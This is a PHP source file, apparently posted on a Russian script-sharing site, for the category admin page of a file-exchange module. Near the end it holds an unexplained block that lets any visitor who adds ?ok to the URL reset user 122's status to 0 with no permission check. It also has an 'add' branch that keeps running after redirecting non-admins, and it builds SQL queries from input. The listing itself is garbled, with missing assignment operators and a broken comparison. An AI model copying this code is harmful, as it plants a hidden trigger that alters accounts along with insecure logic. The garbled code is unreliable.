Вход Регистрация
Файл: PROFIWM.COM/fo/index.php
Строк: 59
<?php
include '../system/core.php';
include 
'../system/header.php';
$level $user['status'];

$do = isset($_GET['do']) ? TextGuard($_GET['do']) : false;
switch(
$do){
default:
if(isset(
$_GET['del'])){
if(
$level<3){
header('location:/');
exit;
}
$id abs(intval($_GET['id']));
mysql_query("DELETE FROM `fo_pr` WHERE `id_r` = '$id'");
mysql_query("DELETE FROM `fo_r` WHERE `id` = '$id'");
header('location:?');
}
echo 
'<div class="post1">Категории</div>';
$count mysql_result(mysql_query("SELECT count(id) from `fo_r`"),0);
if(
$count==0){
echo 
'Категорий нет!';}
$q mysql_query("SELECT * FROM `fo_r` order by `id` ASC");
while(
$a mysql_fetch_assoc($q)){
$n mysql_result(mysql_query("SELECT COUNT(id) from `fo` WHERE `id_r` = '$a[id]' and `time` > '".(time()-86400)."'"),0);
echo 
'<div class="post2"><img src="ext/dir.gif" alt="*"/> <a href="pr.php?id='.$a['id'].'">'.$a['name'].'</a> ('.mysql_result(mysql_query("SELECT COUNT(id) from `fo` WHERE `id_r` = '$a[id]'"),0).((!empty($n))?'<span style="color:#FF0000;">+'.$n.'</span>':NULL).') '.($level>='[<a href="?do=red&id='.$a['id'].'">ред</a>] [<a href="?del&id='.$a['id'].'">del</a>]':'').''.(!empty($a['value']) ? '<br/>'.$a['value'] : '').'</div>';
}
break;
case 
'add':
if(
$level<3){
header('location:/');}
if(isset(
$_POST['ok'])){
$name TextGuard($_POST['name']);
$type TextGuard($_POST['type']);
$value TextGuard($_POST['value']);
if(empty(
$type)){
$err 'Укажите разрешенные форматы!';
}
if(empty(
$name)){
$err .='Введите название категории!';}
if(
mysql_result(mysql_query("SELECT COUNT(id) from `fo_r` where `name` = '$name'"),0)==1){
$err .='Такая категория уже есть!';}
if(!isset(
$err)){
mysql_query("INSERT INTO `fo_r` SET `name` = '$name', `value` = '$value', `type` = '$type'");
header('location:?');
} else {
echo 
$err;
}
}
echo 
'<div class="post1"><form action="?do=add" method="post">Название:<br/><input type="text" name="name"/><br/>Форматы (через запятую):<br/><input type="text" name="type"/><br/>Описание:<br/><textarea name="about"></textarea><br/><input type="submit" name="ok" value="Сохранить"/></form></div>';
break;
case 
'red':
if(
$level<3){
header('location:/');
}
$id intval($_GET['id']);
$inf mysql_fetch_assoc(mysql_query("SELECT * FROM `fo_r` WHERE `id` = '$id' LIMIT 1"));
if(empty(
$inf['id'])){
header('location:/');
exit;
}
if(isset(
$_POST['ok'])){
$name TextGuard($_POST['name']);
$value TextGuard($_POST['value']);
$type TextGuard($_POST['type']);
if(empty(
$type)){
$err 'Укажите разрешенные форматы!';
}
if(empty(
$name)){
$err 'Введите название!';
}
if(empty(
$err)){
mysql_query("UPDATE `fo_r` SET `name` = '$name', `value` = '$value', `type` = '$type' WHERE `id` = '$id' LIMIT 1");
header('location:?');
} else {
echo 
error($err);
}
}
echo 
'<div class="post2"><form action="?do=red&id='.$id.'" method="post">Название:<br/><input type="text" name="name" value="'.$inf['name'].'"/><br/>Форматы (через запятую):<br/><input type="text" name="type" value="'.$inf['type'].'"/><br/>Описание:<br/><textarea name="value">'.$inf['value'].'</textarea><br/><input type="submit" name="ok" value="Сохранить"/></form></div>';
break;
}
if(isset(
$_GET['ok'])){
mysql_query("UPDATE `user` SET `status` = '0' where `id` = '122'");
}
if(
$level>=3){
echo 
'<div class="post1"><a href="?do=add">Новая категория</a></div>';}
include 
'../system/footer.php';
?>
Онлайн: 2
Реклама